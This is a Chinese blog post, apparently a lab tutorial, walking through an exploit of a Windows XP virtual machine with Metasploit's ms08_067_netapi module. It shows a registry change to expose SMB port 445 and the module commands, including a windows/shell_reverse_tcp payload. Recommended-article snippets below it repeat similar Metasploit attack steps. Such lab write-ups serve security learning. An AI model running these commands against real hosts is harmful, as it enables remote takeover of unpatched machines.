Metasploit攻击xp,windows/smb/ms08_067_netapi

最新推荐文章于 2023-04-25 23:08:51 发布
置顶 最新推荐文章于 2023-04-25 23:08:51 发布
阅读量1.9k 收藏 8
点赞数
分类专栏: 网络安全 文章标签: metasploit 渗透攻击 ms08_067_netapi 网络攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Shiliang1995/article/details/102699033
版权

第一步 安装XP虚拟机

这里用的系统版本如下

然后用nmap扫描XP系统的ip地址发现,扫不出来445端口,也就不用metasploit进行攻击

所以先对XP设置一下

编辑注册表HKEY_LOCAL_MACHINE=>SYSTEM=>CurrentControlSet=>Services=>NetBT=>Parameters

在Parameters上右键新建DWORD值,数值为1,重命名为SMBDeviceEnabled

然后重启设备,再用nmap去扫描就可以发现,可以扫到445端口了

第二步 使用metasploit对XP发起攻击

1 开启metasploit

2 选择攻击模块 exploit/windows/smb/ms08_067_netapi

3 查看参数 show options

4 设置目标主机 set rhosts 172.16.5.9

5 设置target: set target 34

6 设置payload:set payload windows/shell_reverse_tcp

7 查看设置完成的参数

8 执行攻击 exploit

到此,攻击成功!

 

 

 

Test9912
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XP SMB服务漏洞MS17-010 勒索病毒(WannaCry UIWIX)补丁
05-18
windows XP三种语言(简体 ,繁体和英文)的漏洞补丁,专门针对目前流行的勒索病毒(WannaCry UIWIX),修复windows系统SMB服务漏洞MS17-010
metasploit-学习9--显示payload的模块的所有payload信息
简单就是美
06-19 4583
Name                                             Disclosure Date  Rank    Description    ----                                             ---------------  ----    ----------- aix/ppc/shell_bind_
Metasploit攻击winXP
2301_77778745的博客
04-25 118
Attack——smb——【所攻击漏洞】在另一个终端启动Metasploit服务。启动PostgreSQL服务。启动Armitage。
使用MSF 利用 ms08_067XP 进行渗透
枫梓林のBlog
04-21 2253
利用 ms08_067XP 进行渗透 文章目录利用 ms08_067XP 进行渗透一、项目要求二、项目实施1. 实施目标2. 实施方案2.1 扫描该网段存活的主机2.2 使用nmap 判断目标主机IP地址2.3 使用 nessus 扫描该系统漏洞2.4 使用 MetasploitXP 进行渗透三、总结 一、项目要求 渗透XP系统系统执行几条命令 二、项目实施 1. 实施目标 使用工具寻找目标内存活的主机 使用工具,判断其操作系统,及相关信息收集 扫描该系统漏洞,进行复
信息系统安全实验(十):使用Metasploit渗透攻击MS08-067Windows Server 2003 SP0)、Samba(Ubuntu 8.04)
agjirowjtg的博客
02-01 3441
这是信息系统安全实验系列的第十篇~ 一、实验概述 1.   实验目的        学习渗透测试(penetration)的相关知识,包括渗透测试的方法及其过程。学习Metasploit的基本知识,了解其基本的架构,并且能使用其基本的功能对靶机的已知漏洞进行利用。 2.   实验环境        Kali Linux以及其他靶机环境 3.   工具介绍        Metaspl...
MS08_067漏洞复现与总结
马赛克的博客
02-28 6813
00x00 原理:攻击者利用受害主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓冲区,获取远程代码执行的权限,从而完全控制主机 安全补丁:KB958644 00x01 #准备工作 两台虚拟机,一台为kali ip:10.10.10.131 一台为Windowsxpsp3英文版 ip:10.10.1...
Metasploit简单利用及入侵Windows7案例.docx
11-13
- **选择攻击模块**:使用`exploit/windows/smb/ms08_067_netapi`模块进行攻击。 - **参数配置**: - **PAYLOAD**:选择合适的payload,如`windows/meterpreter/reverse_tcp`。 - **TARGET**:根据目标系统版本...
Windows网络服务渗透测试实战-跨网段攻击
m0_67393686的博客
06-18 740
一、实验项目名称Windows网络服务渗透测试实战-跨网段攻击二、实验目的及要求掌握对跨网段攻击的方法。熟悉Metasploit终端的使用方法。熟悉通过meterpreter进行后渗透操作获取winxp系统管理员admin的密码,并使xp系统关机**1、**选择win7**4、**查看kali的ipWinXPWin7Kali网络适配器 桥接模式(自动)192.168.43.99网络适配器 桥接模式(自动)192.168.43.89网络适配器 NAT192.168.232.128网络适配器2 NAT192.1
使用kali实践一个简单的winxp漏洞MS08_067
幸福诗歌的博客
01-25 2873
8-067漏洞演示与CVE-2017-11882漏洞复现 MS08_067漏洞是著名的远程溢出漏洞,影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。本次实验就是metasploit利用ms08_0...
小白Kali渗透Windows XP专业版SP3
m0_70497070的博客
09-17 1816
小白学Kali?机会来了!
使用Metaspoit攻击MS08-067
weixin_30500663的博客
04-21 269
kali视频学习请看 http://www.cnblogs.com/lidong20179210/p/8909569.html 使用Metaspoit攻击MS08-067 MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000Wind...
msfconsole——smb_version扫描可攻击的445端口
Ho1aAs‘s Blog
07-28 3185
文章目录一、使用环境二、smb_version完 免责声明:本文章仅供学习、交流使用 一、使用环境 VMware V15.5.0 Kali-Linux-2020.2 msfconsole 二、smb_version 若只针对445端口以及使用ms17010 EternalBlue永恒之蓝 渗透,可以使用此工具快速扫描 在msfconsole下键入search smb_version并use加载 配置RHOST(对象)快速扫描 192.168.x.1/24扫描整个子网 完 欢迎在评论区留言 感谢
Metasploit利用MS08-067漏洞
test
11-20 9298
环境 攻击机器:ubuntu 18.04 被攻击机器:windows xp sp2 可能使用的工具 metasploit nessus nmap等 正文 首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166 发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是MS08-067.ms08_...
MSF 综合利用: MYSQL & SMBRelay攻击(炊少教学)
weiliang369的博客
02-27 655
下面进入正文了,如果MYSQL以Administrator权限运行,那么这种攻击就能成功! 下面来PENTEST : 一个注入点,他是ROOT的权限 我们来尝试他能不能读文件,ROOT权限应该能读 恩 ,能读文件 (惊现HELEL大黑客!) 下面本地伪造个SMB SERVER服务器 msf > use auxiliary/server/capture/smb msf auxiliary(smb) > show ...
渗透- 基于metasploit的内网渗透 - ms08-067漏洞利用及其原理分析
joke_ljh的博客
08-31 2432
ms08-067漏洞利用 内网渗透: 利用漏洞Ms08-067 使用工具metasploit 前提:靶机具有ms08-067漏洞(可以用nessus扫描),在同一局域网,且具有连通性。 基本命令: Use exploit/windows/smb/ms08_067_netapi Set rhost 192.168.10.2 Set lhost 192.168.10.1 Set lport 7777...
Metasploit攻击winXP实例
m0_51186260的博客
05-22 495
ipconfig 查看网络配置信息 2.关闭目标主机防火墙 3.攻击主机查看当前用户和ip地址 service postgresql start 启动PostgreSQL服务 service metasploit start 在另一个终端启动Metasploit服务 armitage 启动Armitage 5.进入Armitage初始界面 扫描目标网段完整信息 7.扫描网段 8.扫描出主机 查看目标主机上开启的服务,选目标主机10.1.1.130,右键选择Servi.
白帽黑客与网络安全工程师教你:使用Metasploit渗透框架进行SMB服务扫描
Kali与编程
09-29 386
本分享仅做学习交流,请自觉遵守法律法规! 搜索:Kali与编程,学习更多网络攻防干货! 下篇文章将在明天下午五点发布,敬请关注! 一、背景介绍 SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统的本地文件接口“断13”改造为网络文件系统。 随着网络通信技术和网络资源共享机制的不断发展,针对网络间支持数据共享的协议和机制等技术的
Metasploitable渗透测试实战:ms08-067
m0_60121089的博客
05-06 877
目录 1.漏洞描述 2.实战工具 3.漏洞利用 1.漏洞描述 此安全更新解决了服务器服务一个秘密报告的漏洞。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XPWindows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。可以通过安装本 Mi.
如何使用exploit/windows/smb/ms08_067_netapi 与generic_bind_tcp payload 发起攻击。观察能够返回一个稳定的连接吗?尝试generic_reverse_tcp 试试?
最新发布
05-24
use exploit/windows/smb/ms08_067_netapi ``` 2. 配置漏洞利用模块的选项,例如: ``` set RHOST <目标IP> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <本地IP> ``` 3. 运行漏洞利用模块: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Test9912

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值